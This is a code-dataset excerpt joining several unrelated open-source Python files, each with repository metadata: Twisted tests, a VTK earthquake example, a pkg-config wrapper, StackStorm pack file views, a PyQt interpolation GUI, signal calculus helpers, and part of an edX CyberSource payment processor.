call.reset(15)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 15)
def test_delayDelayedCall(self):
"""
If a delayed call is re-delayed, the timeout passed to
C{doIteration} is based on the remaining time before the call would
have been made and the additional amount of time passed to the delay
method.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
reactor.now += 10
call.delay(20)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 60)
def test_cancelDelayedCall(self):
"""
If the only delayed call is canceled, C{None} is the timeout passed
to C{doIteration}.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
call.cancel()
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, None)
class ConnectedDatagramPortTestCase(TestCase):
"""
Test connected datagram UNIX sockets.
"""
if skipSockets is not None:
skip = skipSockets
def test_connectionFailedDoesntCallLoseConnection(self):
"""
L{ConnectedDatagramPort} does not call the deprecated C{loseConnection}
in L{ConnectedDatagramPort.connectionFailed}.
"""
def loseConnection():
"""
Dummy C{loseConnection} method. C{loseConnection} is deprecated and
should not get called.
"""
self.fail("loseConnection is deprecated and should not get called.")
port = unix.ConnectedDatagramPort(None, ClientProto())
port.loseConnection = loseConnection
port.connectionFailed("goodbye")
def test_connectionFailedCallsStopListening(self):
"""
L{ConnectedDatagramPort} calls L{ConnectedDatagramPort.stopListening}
instead of the deprecated C{loseConnection} in
L{ConnectedDatagramPort.connectionFailed}.
"""
self.called = False
def stopListening():
"""
Dummy C{stopListening} method.
"""
self.called = True
port = unix.ConnectedDatagramPort(None, ClientProto())
port.stopListening = stopListening
port.connectionFailed("goodbye")
self.assertEqual(self.called, True)
| bsd-3-clause | 2,376,887,156,229,777,400 | 29.315625 | 80 | 0.642202 | false |
RDeckers/ScientificVisualization-1TD389 | Assignments/Project/threshold_quakes_by_time.py | 1 | 1518 | """
This example shows how to create a vtkPolyData object with multiple
scalar attributes (strength and time), and how to efficiently extract
quakes within a specified time interval.
Author: Johan Nysjo
"""
import ReadPointsCSV
import vtk
# Load the earthquake data
points, strength, time_, = ReadPointsCSV.readPoints("events3.csv")
min_strength, max_strength = strength.GetRange()
min_time, max_time = time_.GetRange() # in seconds
# Assign unique names to the scalar arrays
strength.SetName("strength")
time_.SetName("time")
# Create a vtkPolyData object from the earthquake data and specify
# that "strength" should be the active scalar array
points_polydata = vtk.vtkPolyData()
points_polydata.SetPoints(points)
points_polydata.GetPointData().AddArray(strength)
points_polydata.GetPointData().AddArray(time_)
points_polydata.GetPointData().SetActiveScalars("strength")
# Threshold the earthquake points to extract all points within a
# specified time interval.
#
# If you do not specify which input array to process, i.e., if you
# comment out the SetInputArrayToProcess() call, the thresholding will
# be performed on the active scalar array ("strength", in this case).
threshold_filter = vtk.vtkThresholdPoints()
threshold_filter.SetInput(points_polydata)
threshold_filter.ThresholdBetween(min_time, max_time)
threshold_filter.SetInputArrayToProcess(0, 0, 0, 0, "time")
threshold_filter.Update()
# Connect the output of the threshold filter to a vtkGlyph3D filter
# and proceed with the visualization!
| gpl-3.0 | 4,511,994,350,035,439,600 | 33.5 | 70 | 0.784585 | false |
pni-libraries/python-pni | pkgconfig.py | 1 | 3517 |
from __future__ import print_function
import sys
try:
from subprocess import check_output
def execute(lt):
return check_output(lt)
except Exception:
from subprocess import Popen
from subprocess import PIPE
def execute(lt):
p = Popen(lt, stdout=PIPE)
result = ""
for x in p.stdout:
result += x
return result
def strip_string_list(inlist):
"""
strip_string_list(inlist):
Strip all strings in a list of strings from all leading and
trailing blanks.
input arguments:
inlist ............ input list of strings
return:
new list with all strings stripped.
"""
lt = []
for value in inlist:
lt.append(value.strip())
return lt
def remove_empty_strings(inlist):
"""
remove_empty_strings(inlist):
Remove all empty strings from the list of strings.
input arguments:
inlist ............. inpust list of strings
return:
list without empty strings
"""
cnt = inlist.count('')
outlist = list(inlist)
for i in range(cnt):
outlist.remove('')
return outlist
def split_result(result, key):
result = result.strip()
result = result.split(key)
result = remove_empty_strings(result)
return result
class package(object):
command = 'pkg-config'
def __init__(self, pkgname):
self.name = pkgname
def _decode(self, data):
if sys.version_info.major >= 3:
return data.decode('utf-8')
else:
return data
def _get_library_dirs(self):
result = self._decode(
execute([self.command, '--libs-only-L', self.name]))
result = split_result(result, '-L')
return strip_string_list(result)
def _get_include_dirs(self):
result = self._decode(
execute([self.command, '--cflags-only-I', self.name]))
result = split_result(result, '-I')
return strip_string_list(result)
def _get_libraries(self):
result = self._decode(
execute([self.command, '--libs-only-l', self.name]))
result = split_result(result, '-l')
return strip_string_list(result)
def _get_compiler_flags(self):
# first we obtain all compiler flags
total_result = self._decode(
execute([self.command, '--cflags', self.name]))
total_result = total_result.strip()
total_result = total_result.split(" ")
total_result = remove_empty_strings(total_result)
# now we have to obtain all the include files
includes = self._decode(
execute([self.command, '--cflags-only-I', self.name]))
includes = includes.strip()
includes = includes.split(" ")
includes = remove_empty_strings(includes)
for header in includes:
total_result.remove(header)
return total_result
library_dirs = property(_get_library_dirs)
libraries = property(_get_libraries)
compiler_flags = property(_get_compiler_flags)
include_dirs = property(_get_include_dirs)
# testing routine
if __name__ == "__main__":
if len(sys.argv) < 2:
print("You have to pass a package name to as a command line argument!")
sys.exit()
name = sys.argv[1]
p = package(name)
print("library directories: ", p.library_dirs)
print("libraries : ", p.libraries)
print("compiler flags : ", p.compiler_flags)
print("include directories: ", p.include_dirs)
| gpl-2.0 | 9,147,892,070,350,756,000 | 23.943262 | 79 | 0.598521 | false |
tonybaloney/st2 | st2api/st2api/controllers/v1/packviews.py | 1 | 8858 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import codecs
import mimetypes
import os
import six
from wsgiref.handlers import format_date_time
from st2api.controllers.v1.packs import BasePacksController
from st2common.exceptions.db import StackStormDBObjectNotFoundError
from st2common import log as logging
from st2common.models.api.pack import PackAPI
from st2common.persistence.pack import Pack
from st2common.content.utils import get_pack_file_abs_path
from st2common.rbac.types import PermissionType
from st2common.rbac import utils as rbac_utils
from st2common.router import abort
from st2common.router import Response
http_client = six.moves.http_client
__all__ = [
'FilesController',
'FileController'
]
http_client = six.moves.http_client
LOG = logging.getLogger(__name__)
BOM_LEN = len(codecs.BOM_UTF8)
# Maximum file size in bytes. If the file on disk is larger then this value, we don't include it
# in the response. This prevents DDoS / exhaustion attacks.
MAX_FILE_SIZE = (500 * 1000)
# File paths in the file controller for which RBAC checks are not performed
WHITELISTED_FILE_PATHS = [
'icon.png'
]
class BaseFileController(BasePacksController):
model = PackAPI
access = Pack
supported_filters = {}
query_options = {}
def get_all(self):
return abort(404)
def _get_file_size(self, file_path):
return self._get_file_stats(file_path=file_path)[0]
def _get_file_stats(self, file_path):
try:
file_stats = os.stat(file_path)
except OSError:
return (None, None)
return file_stats.st_size, file_stats.st_mtime
def _get_file_content(self, file_path):
with codecs.open(file_path, 'rb') as fp:
content = fp.read()
return content
def _process_file_content(self, content):
"""
This method processes the file content and removes unicode BOM character if one is present.
Note: If we don't do that, files view explodes with "UnicodeDecodeError: ... invalid start
byte" because the json.dump doesn't know how to handle BOM character.
"""
if content.startswith(codecs.BOM_UTF8):
content = content[BOM_LEN:]
return content
class FilesController(BaseFileController):
"""
Controller which allows user to retrieve content of all the files inside the pack.
"""
def __init__(self):
super(FilesController, self).__init__()
self.get_one_db_method = self._get_by_ref_or_id
def get_one(self, ref_or_id, requester_user):
"""
Outputs the content of all the files inside the pack.
Handles requests:
GET /packs/views/files/<pack_ref_or_id>
"""
pack_db = self._get_by_ref_or_id(ref_or_id=ref_or_id)
rbac_utils.assert_user_has_resource_db_permission(user_db=requester_user,
resource_db=pack_db,
permission_type=PermissionType.PACK_VIEW)
if not pack_db:
msg = 'Pack with ref_or_id "%s" does not exist' % (ref_or_id)
raise StackStormDBObjectNotFoundError(msg)
pack_ref = pack_db.ref
pack_files = pack_db.files
result = []
for file_path in pack_files:
normalized_file_path = get_pack_file_abs_path(pack_ref=pack_ref, file_path=file_path)
if not normalized_file_path or not os.path.isfile(normalized_file_path):
# Ignore references to files which don't exist on disk
continue
file_size = self._get_file_size(file_path=normalized_file_path)
if file_size is not None and file_size > MAX_FILE_SIZE:
LOG.debug('Skipping file "%s" which size exceeds max file size (%s bytes)' %
(normalized_file_path, MAX_FILE_SIZE))
continue
content = self._get_file_content(file_path=normalized_file_path)
include_file = self._include_file(file_path=file_path, content=content)
if not include_file:
LOG.debug('Skipping binary file "%s"' % (normalized_file_path))
continue
item = {
'file_path': file_path,
'content': content
}
result.append(item)
return result
def _include_file(self, file_path, content):
"""
Method which returns True if the following file content should be included in the response.
Right now we exclude any file with UTF8 BOM character in it - those are most likely binary
files such as icon, etc.
"""
if codecs.BOM_UTF8 in content[:1024]:
return False
if "\0" in content[:1024]:
# Found null byte, most likely a binary file
return False
return True
class FileController(BaseFileController):
"""
Controller which allows user to retrieve content of a specific file in a pack.
"""
def get_one(self, ref_or_id, file_path, requester_user, if_none_match=None,
if_modified_since=None):
"""
Outputs the content of a specific file in a pack.
Handles requests:
GET /packs/views/file/<pack_ref_or_id>/<file path>
"""
pack_db = self._get_by_ref_or_id(ref_or_id=ref_or_id)
if not pack_db:
msg = 'Pack with ref_or_id "%s" does not exist' % (ref_or_id)
raise StackStormDBObjectNotFoundError(msg)
if not file_path:
raise ValueError('Missing file path')
pack_ref = pack_db.ref
# Note: Until list filtering is in place we don't require RBAC check for icon file
permission_type = PermissionType.PACK_VIEW
if file_path not in WHITELISTED_FILE_PATHS:
rbac_utils.assert_user_has_resource_db_permission(user_db=requester_user,
resource_db=pack_db,
permission_type=permission_type)
normalized_file_path = get_pack_file_abs_path(pack_ref=pack_ref, file_path=file_path)
if not normalized_file_path or not os.path.isfile(normalized_file_path):
# Ignore references to files which don't exist on disk
raise StackStormDBObjectNotFoundError('File "%s" not found' % (file_path))
file_size, file_mtime = self._get_file_stats(file_path=normalized_file_path)
response = Response()
if not self._is_file_changed(file_mtime,
if_none_match=if_none_match,
if_modified_since=if_modified_since):
response.status = http_client.NOT_MODIFIED
else:
if file_size is not None and file_size > MAX_FILE_SIZE:
msg = ('File %s exceeds maximum allowed file size (%s bytes)' %
(file_path, MAX_FILE_SIZE))
raise ValueError(msg)
content_type = mimetypes.guess_type(normalized_file_path)[0] or \
'application/octet-stream'
response.headers['Content-Type'] = content_type
response.body = self._get_file_content(file_path=normalized_file_path)
response.headers['Last-Modified'] = format_date_time(file_mtime)
response.headers['ETag'] = repr(file_mtime)
return response
def _is_file_changed(self, file_mtime, if_none_match=None, if_modified_since=None):
# For if_none_match check against what would be the ETAG value
if if_none_match:
return repr(file_mtime) != if_none_match
# For if_modified_since check against file_mtime
if if_modified_since:
return if_modified_since != format_date_time(file_mtime)
# Neither header is provided therefore assume file is changed.
return True
class PackViewsController(object):
files = FilesController()
file = FileController()
| apache-2.0 | -378,968,515,113,438,460 | 35.00813 | 99 | 0.623166 | false |
rafaelperazzo/iCalcNum | interpolacao.main.py | 1 | 10021 | # -*- coding: utf-8 -*-
import sys
import interpolacao as z
from interpolacaoUi import *
import numpy as np
import pylab as plt
from sympy import *
from PyQt4.QtGui import *
reload(sys)
sys.setdefaultencoding('utf8')
def str2list(texto):
resultado = map(float,texto.split())
if type(resultado) is list:
return True
else:
return False
def mensagem(tipo,titulo,texto,detalhes):
msg = QMessageBox()
if tipo==0:
msg.setIcon(QMessageBox.Information)
elif tipo==1:
msg.setIcon(QMessageBox.Warning)
elif tipo==2:
msg.setIcon(QMessageBox.Critical)
msg.setText(texto)
msg.setInformativeText(u'Informações adicionais')
msg.setWindowTitle(titulo)
msg.setDetailedText(detalhes)
msg.setStandardButtons(QMessageBox.Ok)
retval = msg.exec_()
def entradaValida():
input1 = False
input2 = False
input3 = False
input4 = False
input5 = False
if ui.txtX.text()!='':
input1 = True
if ui.txtY.text()!='':
input2 = True
if ui.txtPrecisao.text()!='':
input3 = True
if ui.txtPonto.text()!='':
input4 = True
if ui.txtQuantidade.text()!='':
input5 = True
try:
if not str2list(str(ui.txtX.text())):
input1 = False
if not str2list(str(ui.txtY.text())):
input2 = False
numerico = float(ui.txtPrecisao.text())
numerico = float(ui.txtPonto.text())
numerico = float(ui.txtQuantidade.text())
except ValueError as e:
input1 = False
if input1 and input2 and input3 and input4 and input5:
return True
else:
return False
def cmbMetodoChanged():
metodo = ui.cmbMetodo.currentIndex()
if metodo==0:
ui.txtPonto.setDisabled(True)
elif metodo==1:
ui.txtPonto.setDisabled(False)
elif metodo==2:
ui.txtPonto.setDisabled(False)
elif metodo==3:
ui.txtPonto.setDisabled(False)
#FUNCAO DO CLICK DO BOTAO
def btnCalcularClick():
if entradaValida():
ui.txtResultado.clear()
eixoX = str(ui.txtX.text())
eixoX = map(float,eixoX.split())
eixoY = str(ui.txtY.text())
eixoY = map(float,eixoY.split())
precisao = int(ui.txtPrecisao.text())
if ui.cmbMetodo.currentIndex()==0: #MINIMOS QUADRADOS
resultado = z.minimosQuadrados(eixoX,eixoY,precisao)
ui.txtResultado.append('***************')
ui.txtResultado.append('a0')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'a1')
ui.txtResultado.append('***************************')
ui.txtResultado.append(str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Função')
ui.txtResultado.append('***************')
ui.txtResultado.append('f(x)= ' + str(resultado[2]))
elif ui.cmbMetodo.currentIndex()==1: #splines lineares
ponto = float(ui.txtPonto.text())
resultado = z.splinesLineares(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append('Splines')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Índice')
ui.txtResultado.append('***************************')
ui.txtResultado.append('Utilizando o spline: ' + str(resultado[1]+1))
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Interpolação no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append('f(' + str(ponto) +')= ' + str(resultado[2]))
elif ui.cmbMetodo.currentIndex()==2: #LAGRANGE
ponto = float(ui.txtPonto.text())
resultado = z.lagrange(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append('Valor interpolado no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Polinômio não simplificado')
ui.txtResultado.append('***************************')
ui.txtResultado.append('f(x)= ' + str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append('SIMPLIFICANDO')
ui.txtResultado.append('***************')
ui.txtResultado.append(pretty(resultado[2],use_unicode=True))
else: #DIFERENÇAS DIVIDIDAS
ponto = float(ui.txtPonto.text())
resultado = z.newton(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Diferenças divididas')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[3]))
ui.txtResultado.append('***************')
ui.txtResultado.append('Valor interpolado no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Polinômio não simplificado')
ui.txtResultado.append('***************************')
#expressao = sympify(resultado[1])
#expressao = pretty(expressao,use_unicode=False)
#print expressao
#ui.txtResultado.append(expressao)
ui.txtResultado.append('f(x)= ' + str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append('SIMPLIFICANDO')
ui.txtResultado.append('***************')
ui.txtResultado.append(pretty(resultado[2],use_unicode=True))
#print(resultado[3])
#print(resultado[1])
else:
#QMessageBox.critical(None,'Erro!',u'Entrada Inválida!',QMessageBox.Ok)
mensagem(2,u'Erro!',u'Entrada inválida!',u'Os dados de entrada devem ser numéricos!')
def btnVerGraficoClick():
btnCalcularClick()
eixoX = str(ui.txtX.text())
eixoX = map(float,eixoX.split())
eixoY = str(ui.txtY.text())
eixoY = map(float,eixoY.split())
precisao = int(ui.txtPrecisao.text())
if ui.cmbMetodo.currentIndex()==0:
funcao = z.minimosQuadrados(eixoX,eixoY,precisao)[2]
elif ui.cmbMetodo.currentIndex()==2:
funcao = z.lagrange(eixoX,eixoY,precisao,1)[2]
elif ui.cmbMetodo.currentIndex()==3:
funcao = z.newton(eixoX,eixoY,precisao,1)[2]
else:
ponto = float(ui.txtPonto.text())
resultado = z.splinesLineares(eixoX,eixoY,precisao,ponto)
indice = resultado[1]
funcao = resultado[0][indice]
#QMessageBox.information(None,u'Informação',u'Função ainda não disponível.',QMessageBox.Ok)
if ui.cmbMetodo.currentIndex()==1:
figure = plt.figure(1)
ax1 = figure.add_subplot(111)
ax1.axhline(linewidth=4,color="black")
ax1.axvline(linewidth=4,color="black")
plt.grid(True)
fx, = plt.plot(eixoX,eixoY, 'r',label='f(x)',color='k',linewidth=2.0)
#dx, = plt.plot(x,y2,'r', label='f\'(x)',color='k',linewidth=1.0)
plt.show()
else:
funcao = str(funcao)
x=np.linspace(min(eixoX),max(eixoX),100)
y2 = eval(funcao)
figure = plt.figure(1)
ax1 = figure.add_subplot(111)
ax1.axhline(linewidth=4,color="black")
ax1.axvline(linewidth=4,color="black")
plt.grid(True)
#plt.xlim(min(eixoX),max(eixoX))
#plt.ylim(min(eixoY),max(eixoY))
fx, = plt.plot(eixoX,eixoY, 'ro',label='f(x)',color='k',linewidth=2.0)
dx, = plt.plot(x,y2,'r', label='f\'(x)',color='k',linewidth=1.0)
plt.show()
#janela = Window(window,eixoX,eixoY,str(funcao))
#janela.setAttribute(QtCore.Qt.WA_DeleteOnClose,True)
#janela.exec_()
def sair():
quit()
def btnAleatorioClick():
tamanho = int(ui.txtQuantidade.text())+1
listaX = []
listaY=[]
for i in range(1,tamanho,1):
x = np.random.randint(0,30)
y = np.random.randint(0,50)
while x in listaX:
x = np.random.randint(0,30)
while y in listaY:
y = np.random.randint(0,30)
listaX.append(x)
listaY.append(y)
lX = str(listaX)
lY = str(listaY)
lX = lX.replace('[','')
lX = lX.replace(',',' ')
lX = lX.replace(']','')
lY = lY.replace('[','')
lY = lY.replace(',',' ')
lY = lY.replace(']','')
ui.txtX.setText(lX)
ui.txtY.setText(lY)
def salvar():
fileName = QFileDialog.getSaveFileName(None, "Salvar Como")
if (fileName!=''):
f = open(fileName,'w')
resultado = str(ui.txtX.text()) + '\n' + str(ui.txtY.text()) + '\n'
resultado = resultado + str(ui.txtResultado.toPlainText()) + '\n'
f.write(resultado)
f.close()
#INICIANDO APLICACAO
app = QApplication(sys.argv)
#CRIANDO JANELA PRINCIPAL
window = QMainWindow()
ui = Ui_interpolacaoPrincipal()
ui.setupUi(window)
#LIGANDO CLICK DO BOTAO A FUNCAO ACIMA
ui.btnCalcular.clicked.connect(btnCalcularClick)
ui.btnGrafico.clicked.connect(btnVerGraficoClick)
ui.btnAleatorios.clicked.connect(btnAleatorioClick)
#ui.actionSair.triggered.connect(sair)
ui.cmbMetodo.currentIndexChanged.connect(cmbMetodoChanged)
ui.actionSalvarComo.triggered.connect(salvar)
window.show()
sys.exit(app.exec_())
| gpl-3.0 | 3,902,660,676,013,172,000 | 36.732075 | 99 | 0.563256 | false |
bendudson/pyxpad | pyxpad/calculus.py | 1 | 1993 | """
Calculus on XPadDataItem objects
"""
from .pyxpad_utils import XPadDataItem
from numpy import zeros, cumsum
def integrate(item):
"""
Integrate the given trace
Inputs
------
item - an XPadDataItem object (or equivalent)
Returns
-------
an XPadDataItem object
"""
if len(item.dim) != 1:
raise ValueError("Can only integrate 1D traces currently")
# Create a result
result = XPadDataItem()
if item.name != "":
result.name = "INTG( "+item.name+" )"
result.source = item.source
if item.label != "":
result.label = "INTG( "+item.label+" )"
if item.units != "":
result.units = item.units+"*"+item.dim[0].units
result.data = zeros(item.data.shape)
time = item.dim[0].data
result.data[1:] = cumsum(0.5*(time[1:]-time[0:-1])*(item.data[1:] + item.data[0:-1]))
result.dim = item.dim
result.order = item.order
result.time = item.time
return result
def differentiate(item):
"""
Differentiates the given trace
Inputs
------
item - an XPadDataItem object (or equivalent)
Returns
-------
an XPadDataItem object
"""
if len(item.dim) != 1:
raise ValueError("Can only differentiate 1D traces")
# Create a result
result = XPadDataItem()
if item.name != "":
result.name = "Diff(" + item.name + ")"
result.source = item.source
if item.label != "":
result.label = "Diff(" + item.label + ")"
if item.units != "":
result.units = item.units + item.dim[0].units + chr(0x207B) + chr(0x00B9)
result.dim = item.dim
result.order = item.order
result.time = item.time
time = item.dim[item.order].data
result.data = zeros(len(item.data))
for i in range(1, len(result.data)-1):
result.data[i] = (item.data[i+1]-item.data[i-1])/(time[i+1]-time[i-1])
result.data[-1] = result.data[-2]
result.data[0] = result.data[1]
return result
| gpl-3.0 | -439,367,664,206,884,740 | 20.202128 | 89 | 0.583041 | false |
nttks/edx-platform | lms/djangoapps/shoppingcart/processors/CyberSource2.py | 1 | 28440 | """
Implementation of the CyberSource credit card processor using the newer "Secure Acceptance API".
The previous Hosted Order Page API is being deprecated as of 9/14.
For now, we're keeping the older implementation in the code-base so we can
quickly roll-back by updating the configuration. Eventually, we should replace
the original implementation with this version.
To enable this implementation, add the following Django settings:
CC_PROCESSOR_NAME = "CyberSource2"
CC_PROCESSOR = {
"CyberSource2": {
"SECRET_KEY": "<secret key>",
"ACCESS_KEY": "<access key>",
"PROFILE_ID": "<profile ID>",
"PURCHASE_ENDPOINT": "<purchase endpoint>"
}
}
"""
import hmac
import binascii
import re
import json
import uuid
import logging
from textwrap import dedent
from datetime import datetime
from collections import OrderedDict, defaultdict
from decimal import Decimal, InvalidOperation
from hashlib import sha256
from django.conf import settings
from django.utils.translation import ugettext as _, ugettext_noop
from edxmako.shortcuts import render_to_string
from shoppingcart.models import Order
from shoppingcart.processors.exceptions import *
from shoppingcart.processors.helpers import get_processor_config
from microsite_configuration import microsite
log = logging.getLogger(__name__)
# Translators: this text appears when an unfamiliar error code occurs during payment,
# for which we don't know a user-friendly message to display in advance.
DEFAULT_REASON = ugettext_noop("UNKNOWN REASON")
def process_postpay_callback(params):
"""
Handle a response from the payment processor.
Concrete implementations should:
1) Verify the parameters and determine if the payment was successful.
2) If successful, mark the order as purchased and call `purchased_callbacks` of the cart items.
3) If unsuccessful, try to figure out why and generate a helpful error message.
4) Return a dictionary of the form:
{'success': bool, 'order': Order, 'error_html': str}
Args:
params (dict): Dictionary of parameters received from the payment processor.
Keyword Args:
Can be used to provide additional information to concrete implementations.
Returns:
dict
"""
try:
valid_params = verify_signatures(params)
result = _payment_accepted(
valid_params['req_reference_number'],
valid_params['auth_amount'],
valid_params['req_currency'],
valid_params['decision']
)
if result['accepted']:
_record_purchase(params, result['order'])
return {
'success': True,
'order': result['order'],
'error_html': ''
}
else:
_record_payment_info(params, result['order'])
return {
'success': False,
'order': result['order'],
'error_html': _get_processor_decline_html(params)
}
except CCProcessorException as error:
log.exception('error processing CyberSource postpay callback')
# if we have the order and the id, log it
if hasattr(error, 'order'):
_record_payment_info(params, error.order)
else:
log.info(json.dumps(params))
return {
'success': False,
'order': None, # due to exception we may not have the order
'error_html': _get_processor_exception_html(error)
}
def processor_hash(value):
"""
Calculate the base64-encoded, SHA-256 hash used by CyberSource.
Args:
value (string): The value to encode.
Returns:
string
"""
secret_key = get_processor_config().get('SECRET_KEY', '')
hash_obj = hmac.new(secret_key.encode('utf-8'), value.encode('utf-8'), sha256)
return binascii.b2a_base64(hash_obj.digest())[:-1] # last character is a '\n', which we don't want
def verify_signatures(params):
"""
Use the signature we receive in the POST back from CyberSource to verify
the identity of the sender (CyberSource) and that the contents of the message
have not been tampered with.
Args:
params (dictionary): The POST parameters we received from CyberSource.
Returns:
dict: Contains the parameters we will use elsewhere, converted to the
appropriate types
Raises:
CCProcessorSignatureException: The calculated signature does not match
the signature we received.
CCProcessorDataException: The parameters we received from CyberSource were not valid
(missing keys, wrong types)
"""
# First see if the user cancelled the transaction
# if so, then not all parameters will be passed back so we can't yet verify signatures
if params.get('decision') == u'CANCEL':
raise CCProcessorUserCancelled()
# if the user decline the transaction
# if so, then auth_amount will not be passed back so we can't yet verify signatures
if params.get('decision') == u'DECLINE':
raise CCProcessorUserDeclined()
# Validate the signature to ensure that the message is from CyberSource
# and has not been tampered with.
signed_fields = params.get('signed_field_names', '').split(',')
data = u",".join([u"{0}={1}".format(k, params.get(k, '')) for k in signed_fields])
returned_sig = params.get('signature', '')
if processor_hash(data) != returned_sig:
raise CCProcessorSignatureException()
# Validate that we have the paramters we expect and can convert them
# to the appropriate types.
# Usually validating the signature is sufficient to validate that these
# fields exist, but since we're relying on CyberSource to tell us
# which fields they included in the signature, we need to be careful.
valid_params = {}
required_params = [
('req_reference_number', int),
('req_currency', str),
('decision', str),
('auth_amount', Decimal),
]
for key, key_type in required_params:
if key not in params:
raise CCProcessorDataException(
_(
u"The payment processor did not return a required parameter: {parameter}"
).format(parameter=key)
)
try:
valid_params[key] = key_type(params[key])
except (ValueError, TypeError, InvalidOperation):
raise CCProcessorDataException(
_(
u"The payment processor returned a badly-typed value {value} for parameter {parameter}."
).format(value=params[key], parameter=key)
)
return valid_params
def sign(params):
"""
Sign the parameters dictionary so CyberSource can validate our identity.
The params dict should contain a key 'signed_field_names' that is a comma-separated
list of keys in the dictionary. The order of this list is important!
Args:
params (dict): Dictionary of parameters; must include a 'signed_field_names' key
Returns:
dict: The same parameters dict, with a 'signature' key calculated from the other values.
"""
fields = u",".join(params.keys())
params['signed_field_names'] = fields
signed_fields = params.get('signed_field_names', '').split(',')
values = u",".join([u"{0}={1}".format(i, params.get(i, '')) for i in signed_fields])
params['signature'] = processor_hash(values)
params['signed_field_names'] = fields
return params
def render_purchase_form_html(cart, callback_url=None, extra_data=None):
"""
Renders the HTML of the hidden POST form that must be used to initiate a purchase with CyberSource
Args:
cart (Order): The order model representing items in the user's cart.
Keyword Args:
callback_url (unicode): The URL that CyberSource should POST to when the user
completes a purchase. If not provided, then CyberSource will use
the URL provided by the administrator of the account
(CyberSource config, not LMS config).
extra_data (list): Additional data to include as merchant-defined data fields.
Returns:
unicode: The rendered HTML form.
"""
return render_to_string('shoppingcart/cybersource_form.html', {
'action': get_purchase_endpoint(),
'params': get_signed_purchase_params(
cart, callback_url=callback_url, extra_data=extra_data
),
})
def get_signed_purchase_params(cart, callback_url=None, extra_data=None):
"""
This method will return a digitally signed set of CyberSource parameters
Args:
cart (Order): The order model representing items in the user's cart.
Keyword Args:
callback_url (unicode): The URL that CyberSource should POST to when the user
completes a purchase. If not provided, then CyberSource will use
the URL provided by the administrator of the account
(CyberSource config, not LMS config).
extra_data (list): Additional data to include as merchant-defined data fields.
Returns:
dict
"""
return sign(get_purchase_params(cart, callback_url=callback_url, extra_data=extra_data))
def get_purchase_params(cart, callback_url=None, extra_data=None):
"""
This method will build out a dictionary of parameters needed by CyberSource to complete the transaction
Args:
cart (Order): The order model representing items in the user's cart.
Keyword Args:
callback_url (unicode): The URL that CyberSource should POST to when the user
completes a purchase. If not provided, then CyberSource will use
the URL provided by the administrator of the account
(CyberSource config, not LMS config).
extra_data (list): Additional data to include as merchant-defined data fields.
Returns:
dict
"""
total_cost = cart.total_cost
amount = "{0:0.2f}".format(total_cost)
params = OrderedDict()
params['amount'] = amount
params['currency'] = cart.currency
params['orderNumber'] = "OrderId: {0:d}".format(cart.id)
params['access_key'] = get_processor_config().get('ACCESS_KEY', '')
params['profile_id'] = get_processor_config().get('PROFILE_ID', '')
params['reference_number'] = cart.id
params['transaction_type'] = 'sale'
params['locale'] = 'en'
params['signed_date_time'] = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
params['signed_field_names'] = 'access_key,profile_id,amount,currency,transaction_type,reference_number,signed_date_time,locale,transaction_uuid,signed_field_names,unsigned_field_names,orderNumber'
params['unsigned_field_names'] = ''
params['transaction_uuid'] = uuid.uuid4().hex
params['payment_method'] = 'card'
if callback_url is not None:
if isinstance(callback_url, tuple):
callback_url1 = callback_url[0]
callback_url2 = callback_url[1] if len(callback_url) >= 2 else callback_url[0]
else:
callback_url1 = callback_url
callback_url2 = callback_url
params['override_custom_receipt_page'] = callback_url1
params['override_custom_cancel_page'] = callback_url2
if extra_data is not None:
# CyberSource allows us to send additional data in "merchant defined data" fields
for num, item in enumerate(extra_data, start=1):
key = u"merchant_defined_data{num}".format(num=num)
params[key] = item
return params
def get_purchase_endpoint():
"""
Return the URL of the payment end-point for CyberSource.
Returns:
unicode
"""
return get_processor_config().get('PURCHASE_ENDPOINT', '')
def _payment_accepted(order_id, auth_amount, currency, decision):
"""
Check that CyberSource has accepted the payment.
Args:
order_num (int): The ID of the order associated with this payment.
auth_amount (Decimal): The amount the user paid using CyberSource.
currency (str): The currency code of the payment.
decision (str): "ACCEPT" if the payment was accepted.
Returns:
dictionary of the form:
{
'accepted': bool,
'amnt_charged': int,
'currency': string,
'order': Order
}
Raises:
CCProcessorDataException: The order does not exist.
CCProcessorWrongAmountException: The user did not pay the correct amount.
"""
try:
order = Order.objects.get(id=order_id)
except Order.DoesNotExist:
raise CCProcessorDataException(_("The payment processor accepted an order whose number is not in our system."))
if decision == 'ACCEPT':
if auth_amount == order.total_cost and currency.lower() == order.currency.lower():
return {
'accepted': True,
'amt_charged': auth_amount,
'currency': currency,
'order': order
}
else:
